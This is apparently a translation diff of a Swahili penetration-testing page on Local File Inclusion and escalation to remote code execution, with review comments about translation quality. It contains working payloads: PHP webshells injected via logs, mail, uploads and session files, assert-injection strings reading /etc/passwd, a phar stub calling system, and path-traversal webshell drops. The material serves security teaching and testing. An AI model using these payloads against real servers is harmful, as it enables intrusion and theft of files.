$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();
```
Ili kujenga faili ya `.phar`, amri ifuatayo inapaswa kutekelezwa:
Ili ku-compile faili la `.phar`, amri ifuatayo inapaswa kutekelezwa:
```bash
php --define phar.readonly=0 create_path.php
```
Wakati wa utekelezaji, faili iitwayo `test.phar` itaundwa, ambayo inaweza kutumika kuwanufaisha udhaifu wa Local File Inclusion (LFI).
Upon execution, a file named `test.phar` will be created, which could potentially be leveraged to exploit Local File Inclusion (LFI) vulnerabilities.
Katika kesi ambapo LFI inasoma tu faili bila kutekeleza PHP code iliyomo ndani, kupitia functions kama `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, au `filesize()`, inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusishwa na kusoma faili kwa kutumia protocol ya `phar`.
Katika kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions such as `file_get_contents()`, `fopen()`, `file()`, `file_exists()`, `md5_file()`, `filemtime()`, or `filesize()`, inaweza kujaribu exploitation ya deserialization vulnerability. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya `phar`.
Kwa ufafanuzi wa kina kuhusu kuwanufaisha deserialization vulnerabilities katika muktadha wa `.phar` files, rejea hati iliyounganishwa hapa chini:
For a detailed understanding of exploiting deserialization vulnerabilities in the context of `.phar` files, refer to the document linked below:
[Phar Deserialization Exploitation Guide](phar-deserialization.md)
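Review bot: two Swahili sentences are replaced by English ("Upon execution, a file named `test.phar` will be created..." and "For a detailed understanding of exploiting deserialization vulnerabilities..."), undoing an existing translation; restore the removed lines. The new paragraph on the read-only LFI case also keeps "functions such as" and "or" in English inside the function list.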
@ -373,36 +373,36 @@ phar-deserialization.md
### CVE-2024-2961
Ilikuwa inawezekana kuabusu **any arbitrary file read from PHP that supports php filters** kupata RCE. Maelezo ya kina yanaweza [**kupatikana katika chapisho hili**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** katika PHP heap ilitumiwa ku**badilisha chain ya free chunks** ya ukubwa maalum ili kuweza **kuandika chochote kwa anwani yoyote**, hivyo hook iliongezwa kuitwa **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kuabusu php filters zaidi.
Ilikuwa inawezekana kutumia vibaya **any arbitrary file read from PHP that supports php filters** kupata RCE. The detailed description can be [**found in this post**](https://www.ambionics.io/blog/iconv-cve-2024-2961-p1)**.**\
Muhtasari mfupi: **3 byte overflow** katika PHP heap ilitumiwa vibaya ili **alter the chain of free chunks** za ukubwa maalum ili kuweza **write anything in any address**, hivyo hook iliongezwa kuitisha **`system`**.\
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kutumia zaidi php filters.
### Protokoli zaidi
### More protocols
Angalia [ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
Angalia zaidi[ **protocols to include here**](https://www.php.net/manual/en/wrappers.php)**:**
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika katika memory au katika faili ya muda (sina uhakika jinsi hii inaweza kuwa muhimu katika attack ya file inclusion)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kufikia filesystem ya ndani
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kufikia HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kufikia FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Compression Streams
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Kutafuta pathnames zinazolingana na pattern (Hairejeshi kitu kinachoweza kuchapishwa, kwa hivyo sio ya maana hapa)
- [php://memory and php://temp](https://www.php.net/manual/en/wrappers.php.php#wrappers.php.memory) — Andika katika memory au katika faili ya muda (sidhani jinsi hii inaweza kuwa muhimu katika file inclusion attack)
- [file://](https://www.php.net/manual/en/wrappers.file.php) — Kupata filesystem ya eneo
- [http://](https://www.php.net/manual/en/wrappers.http.php) — Kupata HTTP(s) URLs
- [ftp://](https://www.php.net/manual/en/wrappers.ftp.php) — Kupata FTP(s) URLs
- [zlib://](https://www.php.net/manual/en/wrappers.compression.php) — Mtiririko ya compression
- [glob://](https://www.php.net/manual/en/wrappers.glob.php) — Find pathnames matching pattern (Hairejeshi chochote kinachoweza kuchapishwa, hivyo sio muhimu hapa)
- [ssh2://](https://www.php.net/manual/en/wrappers.ssh2.php) — Secure Shell 2
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Haifai kusoma faili za aina yoyote)
- [ogg://](https://www.php.net/manual/en/wrappers.audio.php) — Audio streams (Si muhimu kusoma arbitrary files)
## LFI kupitia 'assert' ya PHP
## LFI via PHP's 'assert'
Local File Inclusion (LFI) inakuwa hatari sana katika PHP pale unaposhughulika na function ya 'assert', ambayo inaweza kutekeleza code ndani ya strings. Hii ni tatizo hasa ikiwa input yenye characters za directory traversal kama ".." inachunguzwa lakini haitakaswi ipasavyo.
Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati wa kushughulikia function ya 'assert', ambayo inaweza kutekeleza msimbo ndani ya strings. Hii ni tatizo hasa ikiwa input inayojumuisha characters za directory traversal kama ".." inakaguliwa lakini haijasafishwa ipasavyo.
Kwa mfano, PHP code inaweza kutengenezwa kuzuia directory traversal kama ifuatavyo:
Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:
```bash
assert("strpos('$file', '..') === false") or die("");
```
Ingawa hili linakusudia kuzuia traversal, kwa bahati mbaya linaumba vector kwa code injection. To exploit this kwa kusoma yaliyomo kwenye faili, attacker angeweza kutumia:
Ingawa hili linalenga kuzuia traversal, kwa bahati mbaya linaunda vector kwa ajili ya code injection. Ili kuvitumia kusoma file contents, attacker anaweza kutumia:
```plaintext
' and die(highlight_file('/etc/passwd')) or '
```
Vivyo hivyo, kwa kutekeleza amri yoyote ya mfumo, mtu anaweza kutumia:
Kwa njia sawa, kwa kutekeleza amri yoyote za mfumo, mtu anaweza kutumia:
```plaintext
' and die(system("id")) or '
```
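Review bot: the headings "### More protocols" and "## LFI via PHP's 'assert'" replace Swahili headings with English, and the CVE-2024-2961 paragraph now mixes in "The detailed description can be [**found in this post**]"; the removed lines had all three translated. "Angalia zaidi[ **protocols to include here**]" is missing the space before the link. Also visible here: the `assert("strpos('$file', '..') === false")` line is fenced as ```bash but is PHP, and the glob:// entry's "Find pathnames matching pattern" stays in English.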
@ -411,38 +411,38 @@ Ni muhimu **URL-encode these payloads**.
## PHP Blind Path Traversal
> [!WARNING]
> Mbinu hii inatumika katika matukio ambapo unadhibiti **file path** ya **PHP function** ambayo itafanya **access a file** lakini hautaona yaliyomo ya file (kama simu rahisi ya **`file()`**) na yaliyomo hayataonyeshwa.
> Mbinu hii inafaa katika kesi ambapo wewe unadhibiti **file path** ya **PHP function** ambayo ita **access a file** lakini hutaona yaliyomo ya faili (kama simu rahisi ya **`file()`**) kwani yaliyomo hayajaonyeshwa.
Katika [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumiwa kupitia PHP filter ili **exfiltrate the content of a file via an error oracle**.
In [**this incredible post**](https://www.synacktiv.com/en/publications/php-filter-chains-file-read-from-error-based-oracle.html) imeelezwa jinsi blind path traversal inaweza kutumiwa via PHP filter ili **exfiltrate the content of a file via an error oracle**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya file kuwa kubwa sana kiasi kwamba **PHP function opening** file itasababisha **error**.
Kwa muhtasari, mbinu inatumia **"UCS-4LE" encoding** kufanya yaliyomo ya faili kuwa **big** kiasi kwamba **PHP function opening** faili itasababisha **error**.
Halafu, ili leak the first char filter **`dechunk`** inatumika pamoja na zingine kama **base64** au **rot13**, na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika kuweka chars nyingine mwanzoni na leak them.
Kisha, ili leak the first char filter **`dechunk`** inatumiwa pamoja na nyingine kama **base64** au **rot13** na hatimaye filters **convert.iconv.UCS-4.UCS-4LE** na **convert.iconv.UTF16.UTF-16BE** zinatumika ili **place other chars at the beggining and leak them**.
Functions zinazoweza kuwa hatarini: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
Functions ambazo zinaweza kuwa hatarini: `file_get_contents`, `readfile`, `finfo->file`, `getimagesize`, `md5_file`, `sha1_file`, `hash_file`, `file`, `parse_ini_file`, `copy`, `file_put_contents (only target read only with this)`, `stream_get_contents`, `fgets`, `fread`, `fgetc`, `fgetcsv`, `fpassthru`, `fputs`
Kwa maelezo ya kitaalamu angalia post iliyotajwa!
Kwa maelezo ya kiufundi angalia post uliotajwa!
## LFI2RCE
### Arbitrary File Write via Path Traversal (Webshell RCE)
Wakati code ya server-side inayochukua/kuupload files inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, jina la file au URL) bila canonicalising na validating, segments `..` na absolute paths zinaweza kutoroka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kawaida unapata unauthenticated RCE kwa ku-drop webshell.
Wakati code ya server-side inayokubali/uploads faili inajenga destination path kwa kutumia data inayodhibitiwa na mtumiaji (mfano, jina la faili au URL) bila canonicalising na validating, `..` segments na absolute paths zinaweza kutoroka kutoka kwenye directory iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kwa kawaida unapata unauthenticated RCE kwa kuacha webshell.
Typical exploitation workflow:
- Tambua write primitive kwenye endpoint au background worker ambayo inakubali path/filename na inaandika content kwenye disk (k.m., message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Tambua web-exposed directories. Mifano ya kawaida:
- Tambua write primitive katika endpoint au background worker inayokubali path/filename na kuandika yaliyomo kwenye disk (mfano, message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
- Tambua web-exposed directories. Common examples:
- Apache/PHP: `/var/www/html/`
- Tomcat/Jetty: `<tomcat>/webapps/ROOT/` → drop `shell.jsp`
- IIS: `C:\inetpub\wwwroot\` → drop `shell.aspx`
- Tengeneza traversal path inayoondoka kwenye storage directory iliyokusudiwa kuelekea webroot, na jumuisha webshell content.
- Tengeneza traversal path inayovunja kutoka kwenye intended storage directory hadi webroot, na jumuisha yaliyomo ya webshell yako.
- Tembelea payload ulioweka na utekeleze amri.
Notes:
Vidokezo:
- The vulnerable service that performs the write may listen on a non-HTTP port (e.g., a JMF XML listener on TCP 4004). The main web portal (different port) will later serve your payload.
- On Java stacks, these file writes are often implemented with simple `File`/`Paths` concatenation. Lack of canonicalisation/allow-listing is the core flaw.
- Kwenye Java stacks, uandishi huu wa faili mara nyingi hufanywa kwa simple `File`/`Paths` concatenation. Ukosefu wa canonicalisation/allow-listing ndiko kasoro kuu.
Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):
Generic XML/JMF-style example (product schemas zinatofautiana – DOCTYPE/body wrapper haina umuhimu kwa traversal):
```xml
<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
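Review bot: the "Vidokezo:" list in this hunk is left half-translated: the first bullet ("The vulnerable service that performs the write may listen on a non-HTTP port…") stays in English while only the second bullet gets a Swahili version, and "Typical exploitation workflow:" and "Common examples:" are untranslated too; translate those lines so the section reads consistently. The rewritten vulnerable-functions line also keeps the English parenthetical "(only target read only with this)" inside the code span, where a short Swahili gloss after the span would read better.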
@ -466,26 +466,26 @@ in.transferTo(out);
</Command>
</JMF>
```
Uimarishaji unaozuia aina hii ya mende:
- Tafuta njia ya kanoni na uthibitishe kuwa ni tawi la saraka ya msingi iliyoorodheshwa kwa ruhusa.
- Kataa njia yoyote inayojumuisha `..`, mizizi ya absolute, au barua za drive; pendelea majina ya faili yaliyotengenezwa.
- Endesha writer kama akaunti yenye vibali vidogo na tengeneza utofauti kati ya saraka za kuandika na mizizi inayohudumiwa.
Uimarishaji unaofanya kazi dhidi ya aina hii ya hitilafu:
- Weka njia hadi canonical path na udhibiti kwamba ni mrithi wa saraka ya msingi iliyoorodheshwa.
- Kataa njia yoyote inayojumuisha `..`, absolute roots, au drive letters; pendelea generated filenames.
- Endesha mchakato wa kuandika kama akaunti yenye ruhusa ndogo na tofautisha saraka za kuandika kutoka kwa served roots.
## Remote File Inclusion
Explained previously, [**follow this link**](#remote-file-inclusion).
Imeelezewa hapo awali, [**follow this link**](#remote-file-inclusion).
### Via Apache/Nginx log file
### Kupitia faili za logi za Apache/Nginx
Ikiwa server ya Apache au Nginx ni **vulnerable to LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na include hilo faili
Iwapo server ya Apache au Nginx iko **vulnerable to LFI** ndani ya include function unaweza kujaribu kufikia **`/var/log/apache2/access.log` or `/var/log/nginx/access.log`**, kuweka ndani ya **user agent** au ndani ya **GET parameter** php shell kama **`<?php system($_GET['c']); ?>`** na ku-include faili hilo
> [!WARNING]
> Kumbuka kwamba **ikiwa utatumia nukuu mbili (double quotes)** kwa shell badala ya **nukuu moja (simple quotes)**, nukuu hizo mbili zitatangazwa kwa ajili ya string "_**quote;**_", **PHP itatoa kosa** hapo na **hakitaendesha chochote kingine**.
> Kumbuka kwamba **kama utatumia double quotes** kwa shell badala ya **simple quotes**, double quotes zitabadilishwa kwa string "_**quote;**_", **PHP itatoa kosa** hapo na **hakutakuwa na chochote kingine kitakachotekelezwa**.
>
> Pia, hakikisha una **andika payload vizuri** au PHP itatoa kosa kila mara inapojaribu kupakia log file na hautapata fursa ya pili.
> Pia, hakikisha **unaandika payload kwa usahihi** au PHP itatoa kosa kila mara itakapo jaribu kupakia faili ya log na hautakuwa na fursa ya pili.
Hii pia inaweza kufanywa katika log nyingine lakini **kuwa mwangalifu,** code iliyomo katika logs inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" kwenye Base64 na inachukuliwa (decoded) ndani ya logs. PHPShell inaweza kuingizwa ndani ya header hii.\
Other possible log paths:
Hii pia inaweza kufanywa katika logi nyingine lakini **kuwa mwangalifu,** code ndani ya logi inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header **authorisation "basic"** ina "user:password" katika Base64 na inachanganuliwa ndani ya logi. PHPShell inaweza kuingizwa ndani ya header hii.\
Njia nyingine zinazowezekana za logi:
```python
/var/log/apache2/access.log
/var/log/apache/access.log
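Review bot: the log-path list that follows "Njia nyingine zinazowezekana za logi:" is fenced as ```python although it is a plain list of file paths; tag it plaintext, as the earlier block in this file is, so highlighting is not misleading. In the same hunk the RFI cross-reference sentence keeps the English link text "follow this link" inside an otherwise Swahili sentence; translate it like the surrounding text.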
@ -499,44 +499,44 @@ Other possible log paths:
```
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Kupitia Barua pepe
### Kupitia Email
**Tuma barua pepe** kwa akaunti ya ndani (user@localhost) ikiwa na PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu ku-include barua pepe ya mtumiaji kwa path kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
**Tuma barua** kwa akaunti ya ndani (user@localhost) ikiwa na PHP payload yako kama `<?php echo system($_REQUEST["cmd"]); ?>` na jaribu ku-include barua ya mtumiaji kwa njia kama **`/var/mail/<USERNAME>`** au **`/var/spool/mail/<USERNAME>`**
### Kupitia /proc/*/fd/*
1. Pakia shells nyingi (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), ambapo $PID = PID ya mchakato (can be brute forced) na $FD ni file descriptor (can be brute forced too)
1. Upload a lot of shells (kwa mfano: 100)
2. Include [http://example.com/index.php?page=/proc/$PID/fd/$FD](http://example.com/index.php?page=/proc/$PID/fd/$FD), with $PID = PID ya process (can be brute forced) na $FD ni file descriptor (can be brute forced too)
### Kupitia /proc/self/environ
Kama faili ya log, tuma payload katika User-Agent, itaonekana ndani ya faili /proc/self/environ
Kama log file, tuma payload katika User-Agent, itaonekana ndani ya /proc/self/environ file
```
GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>
```
### Kupakia
### Kupitia upload
Ikiwa unaweza kupakia faili, ingiza tu shell payload ndani yake (kwa mfano: `<?php system($_GET['c']); ?>`).
Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (e.g : `<?php system($_GET['c']); ?>` ).
```
http://example.com/index.php?page=path/to/uploaded/file.png
```
Ili faili iwe rahisi kusoma ni bora ku-inject ndani ya metadata ya picha/doc/pdf
Ili kufanya faili kusomeka vizuri ni bora kuingiza kwenye metadata ya picha/doc/pdf
### Kupitia upakuaji wa ZIP
### Kupitia Zip fie upload
Pakia faili la ZIP linalojumuisha PHP shell iliyoshinikizwa na ufikie:
Pakia ZIP file inayojumuisha PHP shell iliyobanwa kisha ufikie:
```python
example.com/page.php?file=zip://path/to/zip/hello.zip%23rce.php
```
### Kupitia PHP sessions
Angalia kama tovuti inatumia PHP Session (PHPSESSID)
Angalia ikiwa tovuti inatumia PHP Session (PHPSESSID)
```
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
```
Katika PHP, sessions hizi zinahifadhiwa katika _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili.
Katika PHP vikao hivi vinahifadhiwa ndani ya _/var/lib/php5/sess\\_\[PHPSESSID]\_ mafaili
```
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
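Review bot: the new heading "### Kupitia Zip fie upload" introduces a typo ("fie" for "file") where the old line "### Kupitia upakuaji wa ZIP" was correct; keep the old heading or write "### Kupitia upload ya Zip file". In the same hunk the `zip://…%23rce.php` URL block is fenced as ```python although it is a bare URL; tag it plaintext as the other URL blocks in this file are.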
@ -551,24 +551,24 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
```
### Kupitia ssh
Kama ssh iko hai angalia ni mtumiaji gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
Ikiwa ssh imewekwa, angalia ni mtumiaji gani anayetumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
### **Kupitia** **vsftpd** _**logs**_
Logs za server ya FTP vsftpd ziko katika _**/var/log/vsftpd.log**_. Katika senario ambapo kuna Local File Inclusion (LFI) vulnerability, na ikiwa inawezekana kupata server ya vsftpd iliyofichuliwa, hatua zifuatazo zinaweza kuzingatiwa:
Logi za server ya FTP vsftpd ziko katika _**/var/log/vsftpd.log**_. Katika tukio ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikiaji wa server ya vsftpd iliyofichuliwa unapatikana, hatua zifuatazo zinaweza kuzingatiwa:
1. Ingiza payload ya PHP kwenye uwanja wa username wakati wa mchakato wa kuingia.
2. Baada ya injection, tumia LFI kupata logs za server kutoka _**/var/log/vsftpd.log**_.
1. Inject PHP payload kwenye uwanja wa username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata logi za server kutoka _**/var/log/vsftpd.log**_.
### Kupitia php base64 filter (kutumia base64)
### Kupitia php base64 filter (using base64)
Kama inavyoonyeshwa katika [hii](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter hupuuza tu Non-base64. Unaweza kutumia hilo kupitisha ukaguzi wa extension ya faili: ikiwa utatoa base64 inayomalizika na ".php", itapuuza tu "." na itaongeza "php" kwenye base64. Hapa kuna mfano wa payload:
Kama inavyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter huvipuuza vitu visivyo-base64. Unaweza kutumia hilo kupita ukaguzi wa file extension: ikiwa utatoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna mfano wa payload:
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### Kwa kutumia php filters (hakuna faili inahitajika)
### Via php filters (hakuna faili inahitajika)
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
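Review bot: the new heading "### Kupitia php base64 filter (using base64)" mixes languages where the old "(kutumia base64)" was fully Swahili, and the paragraph "This writeup explains that you can use php filters…" that closes the hunk is still entirely English in this translated file; translate both. The ```url block in this hunk also carries the sentence "NOTE: the payload is …" inside the fence; move it below the fence so the payload URL can be copied on its own.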
@ -577,42 +577,42 @@ This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278
lfi2rce-via-php-filters.md
{{#endref}}
### Kwa kutumia segmentation fault
### Via segmentation fault
**Pakia** faili itakayohifadhiwa kama **ya muda** katika `/tmp`, kisha katika **ombi lile lile,** chochea **segmentation fault**, na kisha **temporary file won't be deleted** na unaweza kuitafuta.
Pakia faili itakayohifadhiwa kama ya muda katika /tmp, kisha katika request ileile, chochea segmentation fault, na basi faili ya muda haitafutwa na unaweza kuitafuta.
{{#ref}}
lfi2rce-via-segmentation-fault.md
{{#endref}}
### Kwa kutumia Nginx temp file storage
### Via Nginx temp file storage
If you found a **Local File Inclusion** and **Nginx** is running in front of PHP you might be able to obtain RCE with the following technique:
Ikiwa umepata Local File Inclusion na Nginx inaendesha mbele ya PHP unaweza kuweza kupata RCE kwa mbinu ifuatayo:
{{#ref}}
lfi2rce-via-nginx-temp-files.md
{{#endref}}
### Kutumia PHP_SESSION_UPLOAD_PROGRESS
### Via PHP_SESSION_UPLOAD_PROGRESS
Ikiwa umepata **Local File Inclusion** hata kama **huna session** na `session.auto_start` ni `Off`. Ukitoa **`PHP_SESSION_UPLOAD_PROGRESS`** katika data ya **multipart POST**, PHP itaanzisha session kwa niaba yako. Unaweza kutumia hili kupata RCE:
Ikiwa umepata Local File Inclusion hata kama huna session na `session.auto_start` iko `Off`. Ikiwa utatoa `PHP_SESSION_UPLOAD_PROGRESS` katika multipart POST data, PHP itawasha session kwa ajili yako. Unaweza kutumia vibaya hii kupata RCE:
{{#ref}}
via-php_session_upload_progress.md
{{#endref}}
### Kupitia upakiaji wa faili za muda kwenye Windows
### Via temp file uploads in Windows
Ikiwa umepata **Local File Inclusion** na server inaendesha kwenye **Windows** unaweza kupata RCE:
Ikiwa umepata Local File Inclusion na server inaendesha kwenye Windows unaweza kupata RCE:
{{#ref}}
lfi2rce-via-temp-file-uploads.md
{{#endref}}
### Kupitia `pearcmd.php` + URL args
### Via `pearcmd.php` + URL args
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowr’s write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsai’s “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).
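Review bot: this hunk swaps the Swahili headings "Kwa kutumia segmentation fault", "Kwa kutumia Nginx temp file storage", "Kutumia PHP_SESSION_UPLOAD_PROGRESS" and "Kupitia upakiaji wa faili za muda kwenye Windows" for English "Via …" headings, while the later headings in the same file ("### Kupitia phpinfo()…", "### Kupitia compress.zlib…", "### Kupitia eternal waiting…") stay Swahili; pick one convention for the file. The rewritten segmentation-fault and PHP_SESSION_UPLOAD_PROGRESS paragraphs also drop the bold emphasis and the backticks around `/tmp` that the old lines had, and the closing `pearcmd.php` paragraph is still entirely English.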
@ -629,7 +629,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php
```
### Kupitia phpinfo() (file_uploads = on)
Ikiwa umepata **Local File Inclusion** na faili inayofichua **phpinfo()** yenye file_uploads = on unaweza kupata RCE:
Ikiwa umegundua **Local File Inclusion** na faili inayofichua **phpinfo()** yenye file_uploads = on unaweza kupata RCE:
{{#ref}}
@ -638,7 +638,7 @@ lfi2rce-via-phpinfo.md
### Kupitia compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure
Ikiwa umepata **Local File Inclusion** na unaweza **exfiltrate the path** ya faili ya muda LAKINI **server** inafanya **checking** kama **file to be included has PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia hii **Race Condition**:
Ikiwa umegundua **Local File Inclusion** na unaweza **exfiltrate the path** ya faili ya muda LAKINI **server** inakagua kama **faili itakayojumuishwa ina PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:
{{#ref}}
@ -647,7 +647,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
### Kupitia eternal waiting + bruteforce
Ikiwa unaweza kuabusu LFI ili **upload temporary files** na kufanya server **hang** utekelezaji wa PHP, unaweza kisha **brute force filenames during hours** kutafuta faili ya muda:
Ikiwa unaweza kutumia LFI kuabuse ili **upload temporary files** na kufanya server **hang** utekelezaji wa PHP, basi unaweza kisha **brute force filenames kwa masaa** ili kupata faili ya muda:
{{#ref}}
@ -656,10 +656,10 @@ lfi2rce-via-eternal-waiting.md
### Kwa Fatal Error
Ikiwa unajumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha kosa hilo).
Ikiwa unajumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).
**Sijui jinsi hili linavyoweza kuwa muhimu lakini linaweza kuwa.**\
_Hata ukisababisha PHP Fatal Error, PHP temporary files zilizopakiwa hufutwa._
**Sijui jinsi hili linavyoweza kuwa na manufaa lakini linaweza kuwa.**\
_Hata kama unasababisha PHP Fatal Error, PHP temporary files uploaded zinafutwa._
<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
@ -7,29 +7,29 @@
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
Msingi ya script ni **kuzalisha Base64** string mwanzoni mwa file ambayo itakamilishwa kwa **decoding** na kutoa payload inayotakiwa ambayo itatafsiriwa na `include`.
Kwa msingi lengo la script ni kukaa na **generate a Base64** string mwanzoni mwa faili ambayo hatimaye itatengenezwa (decoded) kutoa payload inayotakiwa ambayo ita **interpreted by `include`**.
Misingi ya kufanya hivyo ni:
Misingi ya kufanya hili ni:
- `convert.iconv.UTF8.CSISO2022KR` itaweka kila mara `\x1b$)C` mwanzoni mwa string
- `convert.base64-decode` ni mwenye uvumilivu mkubwa; kwa msingi itapuuzia herufi yoyote ambayo si halali kwa base64. Inatoa matatizo ikiwa itakutana na "=" isiyotarajiwa lakini hayo yanaweza kuondolewa na filter `convert.iconv.UTF8.UTF7`
- `convert.iconv.UTF8.CSISO2022KR` daima itaweka `\x1b$)C` mwanzoni mwa string
- `convert.base64-decode` ni mvumilivu sana; kimsingi itapuuzia herufi yoyote ambayo si valid base64. Inasababisha matatizo ikiwa inapokuta "=" isiyotegemewa lakini hayo yanaweza kuondolewa kwa filter `convert.iconv.UTF8.UTF7`.
Mzunguko wa kuunda maudhui ya hiari ni:
Mzunguko wa kuunda yaliyomo yoyote ni:
1. weka mwanzoni `\x1b$)C` kwenye string yetu kama ilivyoelezwa hapo juu
2. tumia mnyororo wa conversions za iconv ambao unaacha base64 yetu ya awali bila kubadilika na kubadilisha sehemu tuliyoiongeza kuwa string ambapo herufi pekee halali za base64 ni sehemu inayofuata ya php code yetu iliyochanganishwa kwa base64
3. base64-decode na kisha base64-encode string ambayo itaondoa takwimu zisizohitajika kati
4. rudi hatua ya 1 ikiwa base64 tunayotaka kujenga bado haijakamilika
5. base64-decode ili kupata php code yetu
1. prepend `\x1b$)C` to our string as described above
2. apply some chain of iconv conversions that leaves our initial base64 intact and converts the part we just prepended to some string where the only valid base64 char is the next part of our base64-encoded php code
3. base64-decode and base64-encode the string which will remove any garbage in between
4. Go back to 1 if the base64 we want to construct isn't finished yet
5. base64-decode to get our php code
> [!WARNING]
